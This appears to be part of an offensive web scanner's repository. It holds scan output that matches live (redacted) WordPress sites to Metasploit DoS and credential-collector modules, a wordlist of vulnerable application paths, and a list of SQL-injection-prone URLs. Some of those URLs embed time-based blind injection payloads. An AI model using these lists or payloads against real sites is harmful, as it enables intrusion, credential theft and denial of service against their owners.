3.0] 127 | Wordpress XML-RPC system.multicall Credential Collector [auxiliary/scanner/http/wordpress_multicall_creds] 128 | WordPress Traversal Directory DoS [auxiliary/dos/http/wordpress_directory_traversal_dos] 129 | 130 | [Found] https://[redacted] [Wordpress 3.8.26] 131 | Wordpress XMLRPC DoS [auxiliary/dos/http/wordpress_xmlrpc_dos] 132 | Wordpress XML-RPC system.multicall Credential Collector [auxiliary/scanner/http/wordpress_multicall_creds] 133 | WordPress Traversal Directory DoS [auxiliary/dos/http/wordpress_directory_traversal_dos] 134 | 135 | [Found] https://[redacted] [Wordpress 3.9.9] 136 | Wordpress XML-RPC system.multicall Credential Collector [auxiliary/scanner/http/wordpress_multicall_creds] 137 | WordPress Traversal Directory DoS [auxiliary/dos/http/wordpress_directory_traversal_dos] 138 | 139 | [Found] https://[redacted] [Wordpress 3.3] 140 | Wordpress XML-RPC system.multicall Credential Collector [auxiliary/scanner/http/wordpress_multicall_creds] 141 | WordPress Traversal Directory DoS [auxiliary/dos/http/wordpress_directory_traversal_dos] 142 | ``` 143 | 144 | -------------------------------------------------------------------------------- /msfPaths.txt: -------------------------------------------------------------------------------- 1 | /ayefeaturesconvert.js 2 | /portal 3 | /dolibarr 4 | /drupal 5 | /userinfo/search 6 | /stmeetings 7 | /forum 8 | /opennms 9 | /zabbix 10 | /_all_dbs 11 | /courier/intermediate_login.html 12 | /admin/index.jsp 13 | /crowd/services 14 | /axis2/services/listServices 15 | /axis2/axis2-admin/login 16 | /cgi-mod/view_help.cgi 17 | /bitweaver 18 | /caidao.php 19 | /clansphere 20 | /clansphere_2011.3 21 | /data/login 22 | /cgi-bin/dna 23 | /.git 24 | /imc 25 | /SiteScope 26 | /db 27 | /VPortal/mgtconsole/CheckPassword.jsp 28 | /status 29 | /jenkins 30 | /eng 31 | /mediawiki 32 | /admin.php 33 | /api/users/login 34 | /provision/index.php 35 | /rips 36 | /s40 37 | /.svn 38 | /admin/j_security_check 39 | /manager/html 40 | /vcms2 41 | /www 42 | /session 43 | /sap/bc/soap/rfc 44 | /bvsmweb 45 | /ATutor 46 | /centreon 47 | /v2/apps 48 | /cgi-bin/chpasswd.cgi 49 | /iControl/iControlPortal.cgi 50 | /ping.ccp 51 | /pandora_console 52 | /components/system/configuration/functions.php 53 | /railo-context 54 | /v1/projects 55 | /RPC2 56 | /spywall/pbcontrol.php 57 | /vcms 58 | /WebCalendar 59 | /WebCalendar-1.2.4 60 | /WeBid 61 | /AjaXplorer 62 | /AjaXplorer-2.5.5 63 | /roller 64 | /appRain 65 | /appRain-q-0.1.5 66 | /Auxiliumpetratepro 67 | /cuteflow 68 | /cuteflow_v.2.11.2 69 | /com_extplorer 70 | /com_extplorer_2.1.0 71 | /gestioip 72 | /glossword/1.8 73 | /glpi 74 | /openadmin 75 | /jmx-console 76 | /invoker/JMXInvokerServlet 77 | /admin-console/login.seam 78 | /kordil_edms 79 | /log1cms2.0 80 | /wiki 81 | /mma.php 82 | /mobilecartly 83 | /moodle 84 | /mt 85 | /interface 86 | /openx 87 | /wls-wsat/CoordinatorPortType 88 | /Phoenix/includes/geoip.php 89 | /php-utility-belt/ajax.php 90 | /bf102 91 | /phpFileManager/index.php 92 | /phpFileManager-0.9.8/index.php 93 | /phpmyadmin 94 | /phptax 95 | /phpwiki 96 | /polarbearcms 97 | /qdPM 98 | /missing404 99 | /sflog 100 | /struts2-showcase 101 | /struts2-rest-showcase/orders/3 102 | /struts2-blank/example/HelloWorld.action 103 | /blank-struts2/login.action 104 | /IDC.php 105 | /sysaid 106 | /testlink-1.9.3 107 | /manager 108 | /jos.php 109 | /vtigercrm 110 | /console 111 | /wikka 112 | /x7chat2 113 | /Zemra/Panel/Zemra/system/command.php 114 | /zenworks 115 | /zpanel 116 | /do/view/Main/WebHome 117 | /lite 118 | /basilic 119 | /basilic-1.5.14 120 | /index.php 121 | /sample 122 | /chat 123 | /GetSimpleCMS 124 | /hastymail2 125 | /horde 126 | /hybridauth 127 | /forums 128 | /joomla 129 | /kimai 130 | /librettoCMS 131 | /librettoCMS_v.2.2.2 132 | /nagios3/cgi-bin/history.cgi 133 | /narcissus-master 134 | /php-ofc-library 135 | /openemr 136 | /opensis 137 | /php-charts 138 | /php-charts_v1.0 139 | /phpcollab 140 | /pp088 141 | /ProjectSend 142 | /seportal 143 | /simple_e_document 144 | /simple_e_document_v_1_31 145 | /cgi-bin/mt 146 | /sugarcrm 147 | /tiki 148 | /vicidial 149 | /webtester5 150 | /xoda 151 | /zimbraAdmin 152 | /zm 153 | /cms400min 154 | /cgi-bin/function.php?argument= 155 | /autopass 156 | /ws/control 157 | /ctc/servlet 158 | /d4d/statusFilter.php 159 | /TrackItWeb 160 | /umbraco 161 | /mantisbt 162 | /struts2-showcase/integration/saveGangster.action 163 | /version 164 | /HtmlAdaptor 165 | /HtmlAdaptor 166 | /rest/v1/AccountService/Accounts 167 | /servicedesk/servicedesk/servicedesk.nocache.js 168 | /servicedesk/servicedesk 169 | /servicedesk/servicedesk/accountSerivce.gwtsvc 170 | /miq_policy/explorer 171 | /index.php/component/users/ 172 | /dashboard 173 | /cgi-bin/tmUnblock.cgi 174 | /interface/index.do 175 | /userSession.do 176 | /data/config/image.do 177 | /telpho/temp/telpho10.epb 178 | /rtc/post/ 179 | /cgi-bin/authLogin.cgi 180 | /user/login 181 | /_users/_all_docs 182 | /English/pages_MacUS/lan_set_content.html 183 | /events/reports/view.cgi 184 | /index.php 185 | /_snapshot/pwn 186 | /_snapshot/pwnie 187 | /login.jsf 188 | /login.jsf 189 | /login.jsf 190 | /windows/code.php 191 | /login 192 | /modules/common/logs 193 | /services/listServices 194 | /services/listServices 195 | /workorder/FileDownload.jsp 196 | /en-US/app/launcher/home 197 | /j_security_check 198 | /WorkOrder.do 199 | /posts 200 | /dukapress/lib/dp_image.php 201 | /gi-media-library/download.php 202 | /mTheme-Unus/css/css.php 203 | /admin.php 204 | /tools.php 205 | /options-general.php 206 | /showcallfwd.cgi 207 | /phonecallfwd.cgi 208 | /showcallfwdperline.cgi 209 | /index.php 210 | /login.php 211 | /cgi-bin/ping.sh 212 | /ossim/action/getaction.php 213 | /ossim/policy/policy.php 214 | /ossim/policy/newpolicy.php 215 | /ossim/conf/reload.php 216 | /ossim/action/modifyactions.php 217 | /ossim/action/getaction.php 218 | /ossim/policy/policy.php 219 | /ossim/policy/newpolicy.php 220 | /ossim/policy/getpolicy.php 221 | /ossim/conf/reload.php 222 | /ossim/session/token.php 223 | /ossim/policy/deletepolicy.php 224 | /ossim/action/deleteaction.php 225 | /continuum/about.action 226 | /en/content/index.php 227 | /en/logon.php 228 | /en/database/import.php 229 | /upload 230 | /ping.html 231 | /agent/linuxpkgs 232 | /img/favicon.png?v=6.0.1-1213 233 | /cgi-bin/setConfigSettings 234 | /cgi-bin/webcm 235 | /josso/signon/login.do 236 | /display.php 237 | /tmUnblock.cgi 238 | /interface/index.do 239 | /m 240 | /nagiosxi/ 241 | /nagiosxi/admin/components.php 242 | /anyterm.html 243 | /anyterm-module 244 | /index.php 245 | /mobile/index.php 246 | /images 247 | /php/utils/router.php/Administrator.get 248 | /spywall/login.php 249 | /spywall/ipchange.php 250 | /spywall/login.php 251 | /spywall/blocked_file.php 252 | /spywall/login.php 253 | /spywall/releasenotes.php 254 | /spywall/login.php 255 | /redirect.cgi 256 | /login.imss 257 | /initCert.imss 258 | /saveCert.imss 259 | /tools_command.php 260 | /includes/inline_image_upload.php 261 | /WANem/result.php 262 | /includes/settings.php 263 | /docs/changes.txt 264 | /cgi-bin/rdfs.cgi 265 | /httpmon.php 266 | /scripts.php 267 | /scripts_exec.php 268 | /login.cgi 269 | /_search 270 | /_search 271 | /jetspeed/login/redirector 272 | /jetspeed/portal/Administrative/site.psml 273 | /addons/uploadify/uploadify.php 274 | /mods/_core/modules 275 | /axis2-admin/login 276 | /themes/dashboard/assets/plugins/jquery-file-upload/server/php 277 | /files/php_pagename 278 | /readme 279 | /actions/beats_uploader.php 280 | /actions/pdir/pname 281 | /event/index3.do 282 | /event/agentUpload 283 | /agentUpload 284 | /new 285 | /gw_login.php 286 | /gw_admin.php?a=edit-own&t=users 287 | /servlet/Main 288 | /j_security_check 289 | /proxy/ssllogin 290 | /global_group_login.php 291 | /userpictures 292 | /admin/libraries/ajaxfilemanager/ajax_create_folder.php 293 | /admin/libraries/ajaxfilemanager/inc/data.php 294 | /examples/save.lsp 295 | /login_page.php 296 | /my_view_page.php 297 | /LiveTime/WebObjects/LiveTime.woa 298 | /LiveTime 299 | /www/delivery/fc.php 300 | /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector 301 | /admin/Login.do 302 | /olt/Login.do 303 | /install.php 304 | /index.php 305 | /index.php 306 | /images 307 | /mods/documents/uploads/ 308 | /includes/jquery.uploadify/upload.php 309 | /SGPAdmin/fileRequest 310 | /appliance/applianceMainPage 311 | /appliance 312 | /errorInSignUp.htm 313 | /Login.jsp 314 | /ChangePhoto.jsp 315 | /login.php 316 | /upload_area 317 | /upload_area/nodes_hierarchy 318 | /wizards/post2file.php 319 | /wizards 320 | /main.php 321 | /index.php 322 | /index.php?loggedout 323 | /wizards/post2file.php 324 | /ajax/jsonQuery.php 325 | /Admin/archive/ArchiveCache 326 | /Admin/archive/upload.jsp 327 | /servlets/FileUploadServlet 328 | /jsp 329 | /wikka.php 330 | /spamlog.txt.php 331 | /etc/apps/phpmyadmin/index.php 332 | /etc/apps/phpmyadmin/import.php 333 | /system_groupmanager.php 334 | /cgi-bin/vmtadmin.cgi 335 | /scripts/upload.php 336 | /admin_area/charts/ofc-library/ofc_upload_image.php 337 | /admin_area/charts/tmp-upload-images 338 | /egallery/uploadify.php 339 | /upload.php 340 | /admin/CHANGES 341 | /admin/config.php 342 | /havalite/upload.php 343 | /install.php 344 | /config.php 345 | /nagiosxi/includes/components/graphexplorer/visApi.php 346 | /nagiosxi/index.php 347 | /ofc_upload_image.php 348 | /interface/login/login.php 349 | /interface/main/main_screen.php 350 | /interface/new/new_comprehensive_save.php 351 | /interface/super/manage_site_files.php 352 | /sites/default/images 353 | /interface/login/login.php 354 | /library/openflashchart/php-ofc-library/ofc_upload_image.php 355 | /library/openflashchart/tmp-upload-images 356 | /index.php 357 | /login.php 358 | /staticpages.php 359 | /admin/downloads.php 360 | /data/down_media 361 | /upload.php 362 | /service/v4/rest.php 363 | /index.php 364 | /admincp/ 365 | /install2.php 366 | /ajax-load-more/core/repeater 367 | /foxypress/uploadify/uploadify.php 368 | /affiliate_images 369 | /front-end-editor/lib/aloha-editor/plugins/extra/draganddropfiles/demo 370 | /infusionsoft/Infusionsoft/utilities/code_generator.php 371 | /uploads/slideshow-gallery 372 | /cgi-bin/kerbynet 373 | /registresult.htm 374 | /cs/pdfupload 375 | /scripts 376 | /upload/upload 377 | /upload 378 | /login.jsf 379 | /webdm/mibbrowser/mibFileUpload 380 | /ServiceEmulation/services/EmulationAdmin 381 | /ServiceEmulation 382 | /servlet/Main 383 | /jsp/tabs.jsp 384 | /rest/collectors/1.0/tempattachment 385 | /SystemTab/uploadImage.asp 386 | /mve/upload/gfd 387 | /LoginPage.do 388 | /api/json/admin/SubmitQuery 389 | /jsp/Login.do 390 | /fileUpload.do 391 | /wlevs/visualizer/upload 392 | /ohw/help/state 393 | /rest/action 394 | /LoginServlet 395 | /Installers 396 | /cbmui/images 397 | /event/index3.do 398 | /event/runQuery.do 399 | /event/j_security_check 400 | /jsp_name 401 | /vtapi/v2/file/scan 402 | -------------------------------------------------------------------------------- /dev/sqlPaths.txt: -------------------------------------------------------------------------------- 1 | /friend-profile.php?id= 2 | /gallery/upload.php 3 | /gbx/index.php 4 | /genre_artists.php 5 | /go_login/validate_credentials/admin/ 6 | /holiday.php 7 | /holiday.php?hid= 8 | /holiday_book.php?hid=1 9 | /home.php 10 | /ig-calendar/user.php?id= 11 | /ig_shop/cart.php?action= 12 | /ig_shop/compare_product.php?id=1 13 | /ig_shop/page.php 14 | /ig_shop/page.php?action= 15 | /image_gallery.php 16 | /imgallery/galeria.php?start=0 17 | /imgallery/popup/koment.php?id_phot= 18 | /imgallery/popup/opis.php?id_phot= 19 | /inc/admin_design.inc.php 20 | /inc/design.inc.php 21 | /inc/elementz.php 22 | /inc/elementz.php?lilil=400&ubild=hacker&pa=hacker 23 | /inc/usercp.php?action=newpass&id=1 24 | /index php go addpage" 25 | /index.asp 26 | /index.asp?tID= 27 | /index.asp?view=archive&day= 28 | /index.php 29 | /index.php/component/quran/index.php 30 | /index.php/component/quran/index.php?option=com_quran&action=viewayat&surano=[INDONESIANCODER] 31 | /index.php/go_site/cpanel/ 32 | /index.php/go_site/cpanel/$type/$action 33 | /index.php?action=collection.imageview&id= 34 | /index.php?custom_language=turkish&user=detaliespopupcondrent&pid= 35 | /index.php?m=video 36 | /index.php?m=video&v= 37 | /index.php?mode=viewuser 38 | /index.php?option=com_hmcommunity&view=fnd_home&id= 39 | /index.php?option=com_jbook 40 | /index.php?option=com_jbuildozer 41 | /index.php?option=com_jbuildozer&view=entriessearch&tmpl=component&mode=module&tpl=3&appid= 42 | /index.php?p= 43 | /index2.php?option=com_airmonoblock&task=focus&id=1 and 1=1 44 | /indir.php?id=-1 45 | /install/index.php 46 | /ixxo-cart-plus-demo/index.php?p=catalog&parent= 47 | /jobdetails.php?pr_id= 48 | /jobs/ 49 | /jobs/?tx_dmmjobcontrol_pi1%5Bsearch_submit%5D=Search&tx_dmmjobcontrol_pi1%5Bsearch%5D%5Bsector%5D%5B%5D=3%29and%20benchmark%2820000000%2csha1%281%29%29--%20 50 | /jobsearchengine/show_search_result.php 51 | /jobsearchengine/show_search_result.php?keyword= 52 | /joomla/index.php 53 | /joomla/index.php/component/quran/index.php?option=com_quran&action=viewayat&surano= 54 | /kb/index.html 55 | /kb/index.html?ToDo=browse 56 | /kubelance/profile.php 57 | /kubelance/profile.php?id= 58 | /labs/module_fichier/upload/upload_filemanager.php 59 | /labs/module_fichier/upload/upload_filemanager.php?dossierup=testing 60 | /labs/stock_fichiers/tmp/ 61 | /labs/stock_fichiers/tmp/ 62 | /land.php', "/land.php?file=edit_config&config_id=1 63 | /latest.php?nid=9 64 | /latest_news_details.php?id= 65 | /lib/base.php 66 | /list.php?Active= 67 | /list.php?pagenum=0&categoryid= 68 | /list_tagitems.php 69 | /lista_anexos.php?tsk_id= 70 | /listing.php 71 | /listing.php?id= 72 | /lyrics_menu/lyrics_song.php 73 | /machform/view.php 74 | /main.php 75 | /main.php?section=UserContainer&subsection=add&id=0 76 | /memory.php?board_user_cook=1 77 | /message_box.php 78 | /message_box.php?theme=&l=[ 79 | /messages.php 80 | /messages.php?forum=1&action=view&mid= 81 | /microweber/api/checkout 82 | /mobius_path/detail.php 83 | /mobius_path/detail.php?t=exhibitions&type=exh&f=&s= 84 | /mod.php 85 | /modules MyAnnonces index php pa view" 86 | /modules-php-name-Siir 87 | /modules.php 88 | /modules/backup/backup-sql.php 89 | /modules/eEmpregos/index.php 90 | /modules/eEmpregos/index.php?pa=view 91 | /modules/mod.php?mod= 92 | /modules/mpay24/confirm.php 93 | /modules/mpay24/confirm.php?MPAYTID=1&STATUS=bbb&TID=a%27%20or%20%27a%27%20in%20%28select%20IF%28SUBSTR%28@@version,1,1%29=5,BENCHMARK%281000000,SHA1%280xDEADBEEF%29%29,%20false%29%29;%20--+ 94 | /modulesmapy24/api/curllog.log 95 | /monstra/admin/index.php 96 | /monstra/admin/index.php?id=filesmanager&delete_dir=./&path=uploads/&token=008708df48237172f6fe2d173dc30529eac132de 97 | /topic.php 98 | /topic.php?CAT_ID=1&FORUM_ID=1&TOPIC_ID= 99 | /topics.php 100 | /toplists.php 101 | /torrents.php 102 | /torrents.php?mode=category 103 | /trade/tradeCategory.php?id= 104 | /tutorial/machform.rar 105 | /typo3/index.php 106 | /typo3/jobs/ 107 | /u5cms/u5admin/deletefile.php 108 | /ulisse/ladder.php 109 | /upload/holiday/hi9223test.php 110 | /uploads/upload.php 111 | /userDetail.php 112 | /vb/bnnr.php 113 | /vb/bnnr.php" 114 | /view.php 115 | /view.php=XX -o XX.out 116 | /view/objectDetail.php 117 | /viewfullprofile1.php 118 | /viewmsg.php 119 | /viscacha/admin.php 120 | /viscacha/admin.php?action=bbcodes&job=censor 121 | /viscacha/pm.php 122 | /w3.php 123 | /wallpaper.php?wallpaperid=1 124 | /wb/admin/login/index.php 125 | /wb/pages/addon.php 126 | /wdcalendar/edit.php" 127 | /webCal3_detail.asp 128 | /webadmin/auth/verification.php 129 | /webadmin/deny/index.php 130 | /webapps/dc/doceboCore/index.php?modname=iotask&op=display&addconnection&gotab=connections 131 | /webboard/admindel.php 132 | /webid/admin/ 133 | /webid/eledicss.php 134 | /webid/logs/cron.log 135 | /whmcs5214/viewinvoice.php 136 | /winducms/admin/content/edit/659/ 137 | /wizards/get2post.php 138 | /wizards/get2post.php?file_name= 139 | /wordpress/pdb-signup/ 140 | /wordpress/wp-admin/admin.php 141 | /wp-admin/admin-ajax.php 142 | /wp-admin/admin.php 143 | /wp-admin/admin.php?page=wpgmp_manage_location&orderby=location_address&order=asc 144 | /wp-content/plugins/cpl/cplphoto.php 145 | /wp-content/plugins/ocim-mp3/source/pages.php 146 | /wp-content/plugins/wp-symposium/ajax/mail_functions.php 147 | /yamamah/index.php 148 | /year2005.php?id= 149 | /yourfalt4/admin/index.php 150 | /zabbix 151 | /zaznam.php?detail_num= 152 | /seotoaster/go 153 | /service-list?city= 154 | /shop.htm 155 | /shop.php 156 | /shopcart/index.php 157 | /show_memorial.php?id= 158 | /show_news.php?news_id= 159 | /show_profile.php?custid=1 160 | /single-video-detail.php?video_id=MTMy&report_videos[]= 161 | /skin_shop/standard/2_view_body/body_default.php 162 | /sn_news/admin/login.htm 163 | /snews/visualiza.php 164 | /sniff.jpg 165 | /sounds/go_bogus.wav.php 166 | /state.php 167 | /story.php 168 | /student/stu-master/view 169 | /stuworkdisplay.php 170 | /tables.php 171 | /templates1/view_product.php 172 | /text.php 173 | /textpattern/textpattern/index.php?event=link&step=link_change_pageby&qty= 174 | /themes/admin/default/modules/show.php 175 | /tiki-list_blogs.php 176 | /tiki-usermenu.php 177 | /page_new.php?id= 178 | /page_show.php?id= 179 | /pages.php?id=1 180 | /paidbanner.php?ID= 181 | /patch/?a= 182 | /path]
183 | /path_to_cp/edit_email.php
184 | /phpMyAdmin/
185 | /phpaccounts/index.php
186 | /phpaccounts/users/1/